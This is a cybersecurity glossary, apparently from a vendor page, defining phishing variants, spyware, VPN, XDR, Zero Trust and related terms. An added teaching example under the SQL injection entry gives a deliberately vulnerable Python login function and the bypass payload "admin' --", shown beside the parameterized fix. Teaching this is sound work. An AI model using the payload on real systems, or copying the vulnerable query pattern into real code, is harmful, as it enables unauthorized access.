A type of targeted phishing attack where the attacker uses gathered details about the targeted victim to increase the credibility of the attack message.
The act of disguising a communication so that it appears to come from a trusted, legitimate source. Attackers manipulate identifying information to deceive recipients and security systems.
Malicious software that secretly enters your device, gathers your personal information (like passwords, browsing habits, financial details) without your consent, and sends it to third parties.
An attack in which SQL syntax is entered into an input field or other request parameter that the application concatenates into a database query, tricking the backend database into returning data it was not meant to expose, or into modifying or deleting data and, in some configurations, executing commands on the server. Prevented by parameterized queries, which keep user input separate from the SQL text.
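Added example (not from the original page, and not WatchGuard code): a deliberately vulnerable Python login check that builds its query by string formatting, beside the parameterized version, run against a constructed in-memory SQLite table. The payload comments out the password comparison so the vulnerable version lets the attacker in as the administrator without knowing the password. The table, user and password are assumptions for this illustration.

```python
import hashlib
import sqlite3

# Constructed in-memory user table (not from the original page). Passwords are
# stored as plain SHA-256 only to keep the example short; real code uses a
# slow, salted password hash such as bcrypt or Argon2.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct-horse").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: string formatting lets input rewrite the query."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND pw_hash = '{pw_hash}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes values separately from the SQL
    text, so a quote in the username is just a character in a string."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash)).fetchone()
    return row is not None


# Constructed payload: closes the string, then "--" comments out the rest of
# the line, so the password check never runs in the vulnerable version.
INJECTION = "admin' --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, INJECTION, "anything"))
    print("safe:", login_safe(db, INJECTION, "anything"))
```

The vulnerable query becomes SELECT id FROM users WHERE username = 'admin' --' AND pw_hash = '...', which SQLite reads as a lookup on admin with a trailing comment. The same placeholder discipline applies to every driver; escaping by hand is the approach that keeps failing.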
A general-purpose protocol for encrypting web, email, and other stream-oriented traffic sent over the Internet. Authenticates the server (and optionally the client) with certificates and prevents eavesdropping and tampering in transit, as in HTTPS websites, email, and VoIP.
An application that appears legitimate but performs malicious actions unbeknown to the user.
A type of phishing attack that uses VoIP or phone calls in an attempt to elicit information from unsuspecting victims.
Stands for Virtual Private Network. Provides the security benefits of a private, dedicated, leased-line network without the cost of owning one. Uses cryptography to make data unreadable in transit over the Internet. Commonly used to connect multiple company locations and remote workers. A common weakness is that many VPNs grant broad network access after a single username-and-password login, so a leaked password opens your systems; enforcing MFA on the VPN reduces this risk. Zero Trust Network Access (ZTNA) is a modern alternative to VPNs.
WatchGuard security service that automatically blocks known malicious sites and uses detailed content and URL filtering tools to prevent inappropriate content, save bandwidth, reduce legal liability, and boost productivity.
A type of spear-phishing attack specifically targeted at high-ranking executives in an organization.
Stands for Extended Detection and Response. While EDR focuses on identifying and responding to threats at the endpoint level, XDR broadens the scope by collecting telemetry data and automatically correlating detections across multiple security domains, including endpoint, identity, email, network, and cloud. Using AI and machine-learning technologies, XDR then analyzes those detections and correlates them into a single, centralized view of each incident.
A cybersecurity strategy based on the principle of "never trust, always verify," assuming threats exist everywhere. Rather than relying on a single technology, it implements multiple security controls, including multi-factor authentication, EDR, Zero Trust Network Access, and dark web credential monitoring. In addition, users only have access to the specific parts of the network they need and not more.
A security model that requires strict identity verification for every person and device, inside or outside the network perimeter, trying to access resources on a private network.
A security framework that assumes threats are everywhere and therefore verifies every user and device attempting to access resources, and grants least-privileged access to specific applications rather than to the entire network. A foundational security model within SASE.
A type of threat that exploits an unknown software vulnerability before the user/developer knows about it or has a patch ready, giving defenders no time to fix it. Also known as a 0-day.